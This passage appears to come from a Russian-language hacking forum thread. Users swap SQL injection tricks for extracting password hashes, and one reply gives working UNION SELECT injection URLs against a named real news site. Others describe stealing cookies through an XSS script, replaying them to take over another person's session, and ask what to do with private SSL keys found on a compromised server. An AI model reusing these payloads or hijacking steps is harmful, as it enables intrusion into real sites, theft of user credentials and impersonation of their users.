сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е. union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 заменить на union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 для начала. Даже на этом пример съекономилось 4 символа
Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script> то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???
Gorev Не вполне понял вопрос. Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32): 1-е 15 символов union select SUBSTRING(passwd, 0, 15) from user c 15 по 30 SUBSTRING(passwd, 15, 30) и остальные 2 SUBSTRING(passwd, 30, 32) ======================== Иногда встречается "наложение" вывода, ну например сдесь: http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Version()),2,3,4,5,6,7,8,9/* Вот так нам не видно юзера http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User(),Database(),Version()),2,3,4,5,6,7,8,9/* А вот так видно всё ======================== Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...
искать не надо ничего - открой проводник, вбей в адресную строку %USERPROFILE%\Cookies и туда скопируй файлы куков своих
Версия 7 попугай нашел куда вставлять куки , а как пароли от сайтов узнать пробовал заходить на сайт с установленной кукой другого компа и ни чего не произошло.. Подскажите ?
ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?
Пипл,нашёл папку на машине: /usr/local/apache/etc/ssl.all Там сертификационные файлы server.crt,server.key,mail.crt,mail.key,webmail.crt,webmail.key... Чё с инми делать не пойму.Ключи там под RSA и приватные к тому же.С SSH-то понятно,а вот с SSL ещё дел не имел ).Мб кто подскажет,что надо делать,какие проги нужны ?